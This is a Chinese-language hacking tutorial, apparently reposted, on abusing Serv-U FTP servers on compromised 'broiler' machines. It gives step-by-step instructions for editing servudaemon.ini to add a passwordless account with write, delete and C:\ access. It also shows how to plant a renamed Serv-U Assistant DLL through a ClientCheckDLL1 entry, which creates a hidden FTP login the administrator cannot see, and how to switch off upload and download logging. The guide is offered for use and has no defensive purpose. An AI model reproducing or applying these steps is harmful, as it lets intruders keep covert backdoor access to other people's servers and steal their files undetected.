如何利用肉雞上的Serv-U

很多肉雞安裝了serv-U服務器，我們可以把它利用起來，下面的方法是可以通過te.net或者nc命令行直接修改serv-U的參數而利用之。

在serv-U的目錄下有一個servudaemon.ini，關鍵是修改servudaemon.ini，第一步，當然是要先把對方的servudaemon.ini下載回來，在本機把它修改好。至于怎么把這個文件取回來不是這里討論的問題，方法很多。

下面請看一個servdaemon.ini的范例，<>中是我寫的說明文字，不是文件中的文字。

[GLOBAL] <定義一些全局參數>
Version=4.0.0.4
RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAawEEBLH71T7nA+cDAgAIUm9nZXJMZWUSbGls

aW5nanVuQHNpbmEuY29tB0VDTGlQU0UA
ProcessID=1748
[DOMAINS] <在這里定義域名及IP，端口號>
Domain1=0.0.0.0
21|Wizard Generated Domain|1|0
[Domain1] <用戶名的定義>
User1=Anonymous|1|0 <第一個用戶是anonymous，即匿名用戶，允許匿名用戶訪問>
User2=1|1|0 <第二個用戶是1>
User3=2|1|0 <第三個用戶是2>
[USER=Anonymous|1] <用戶“anonymous”的定義>
HomeDir=d:\wutemp <用戶anonymous的根目錄>
RelPaths=1 <鎖定在根目錄，如果不鎖定在根目錄可以把該行刪除>
TimeOut=600
Note1="Wizard generated account"
Access1=D:\WUTemp|RLP <用戶anonymous權限設置在此處，R表示讀文件，L表示目錄列表，最后一個P必須有>
[USER=2|1] <用戶“2”的定義>
Password=cuA40FB53D1C89D1E7153EF826B6B38DC3 <用戶密碼設定，我不知道怎么破這個密碼，如果不設密碼可以把該行刪除>
HomeDir=D:\temp
RelPaths=1
TimeOut=600
Access1=D:\temp|RLP <用戶“2”可以讀取d:\temp目錄下的文件，所以可以下載文件>
[USER=1|1] <用戶“1”的定義>
Password=hv12154DF65AC601DDA5D39C2F7B2E0F4C
HomeDir=d:\temp
RelPaths=1
TimeOut=600
Access1=D:\temp|RWLP <用戶“1”對d:\temp有列目錄的權利，可以讀寫該目錄下的文件>

權限設定具體說明：
RL 只能讀文件，下載文件
RWL 可以寫文件，所以可以上載文件
RWML M是可以刪除的權限
RWAMEL A是添加權限，E是執行權限
RWLCD C是目錄創建權限，D是目錄刪除權限

OK，所以首先是把對方的servudaemon.ini下載到本地的機器上，根據自己的需要把這個文件修改好，然后再傳上去覆蓋原文件。

修改的步驟是在[DOMAIN1]中先添加用戶名稱，如上例中已經有三個用戶anonymous、1、2，再添加一個用戶3，密碼為空，在d:\temp目錄下可以讀寫文件、創建刪除目錄，不鎖定在本目錄，同時對C:\有訪問權限。

先在[Domain1]下增加一個用戶，如下：
user4=3|1|0

然后再增加一個段，說明用戶“3”的權限
[user3|1]
HomeDir=d:\temp
TimeOut=600
Access1=D:\temp|RWLCDP
Access2=C:\|RLP

在 Serv-U 中建立隱藏用戶(本地通過，未經肉雞測試~~希望大家完善本文)

在如今的 FTP 服務段軟件中，Serv-U 以其簡單易用性成為廣大管理員的首選，當我
們控制一臺肉雞后，如果它采用 Serv-U 管理 FTP ，我們該如何建立一個隱藏的 FTP 賬
戶來下載他的東東呢？

我們可以采用 Serv-U Assistant 這個軟件，可以到作者網頁 http://www.katkat.com/ 或
者在華軍下載（目前版本為1.01）

這個軟件主要用于擴充 Serv-U 的帳號管理, 它采用Serv-U擴展庫，實現的原理為“帳
號-映射”，建立一個或多個帳號“映射”，當在 Serv-U 中設置好一個固定帳號（即Serv-U
的帳號）后，“映射帳號”就繼承了這個固定帳號的所有權限設置，每個“映射帳號” 有各
自的登錄密碼。

下載壓縮文件 AssServU.zip，解壓后得到以下文件：
AssServU.dll -------- 擴充功能庫
AssServU.exe -------- 管理主程序
AssServU.ini -------- 配置文件
AssServU.mdb -------- 數據庫文件
AssReadme.mht ------- 自述文件

我們的目的是為了隱藏我們 FTP 賬號，因此第一步我們要獲取肉雞上的一個 Serv-U 
的賬戶名（僅賬戶名而已）：3389圖形界面可以通過 ServUAdmin.exe 獲得；命令行下可以
通過 ServUDaemon.ini 獲得，當然最好獲得權限比較大的用戶名（因為我們的隱藏賬號的
權限與他的相同）

第二步：在自己的機器上做好配置：首先為了隱藏的需要，我們將assServU.mdb復制
一份為ServU.dat ，將assServU.dll改名為ServU.dll ；
雙擊 assServU.exe ，在 Settting 選項卡下的 Log options 中去掉 Log system 
messages 、 Log error messages 、 Log file dosnloads 、 Log file uploads 前面的勾（這是
為了系統不記錄日志）；在 Account Datasource 中選 Custom ，在 Connection string 點 
Set ，在“連接”選項卡中的“1。選擇或輸入數據庫名稱”中將 AssServU.mdb 改為 
Servu.dat ，然后點“確定”，在退回 Setting 選項卡后點 Save 。
在 Account 選項卡下添加用戶， Username 為你想添加的用戶，如：hacker， Password 
為你的密碼，如：123， Serv-U account 為第一步中你選擇的權限較大的用戶，如：admin，
然后點 Save 按鈕。

好了，配置完成。

第三步：上傳我們的 ServU.dat 和 ServU.dll ，修改肉雞的 ServUDaemon.ini 文件，添加
以下字段：
[EXTERNAL]
ClientCheckDLL1=ServU.dll
然后重起Serv-U 服務

這樣你就可以用隱藏賬號登陸了，此時登陸賬號還是第一步你選擇的賬號，但密碼格式
為“你的用戶名=密碼”，如果你像第二步那樣設置的話，登陸名就為admin,密碼為hacker=111

hehe,這樣管理員在管理界面什么都看不出來
OK,game over!

原文轉自：http://www.kjueaiud.com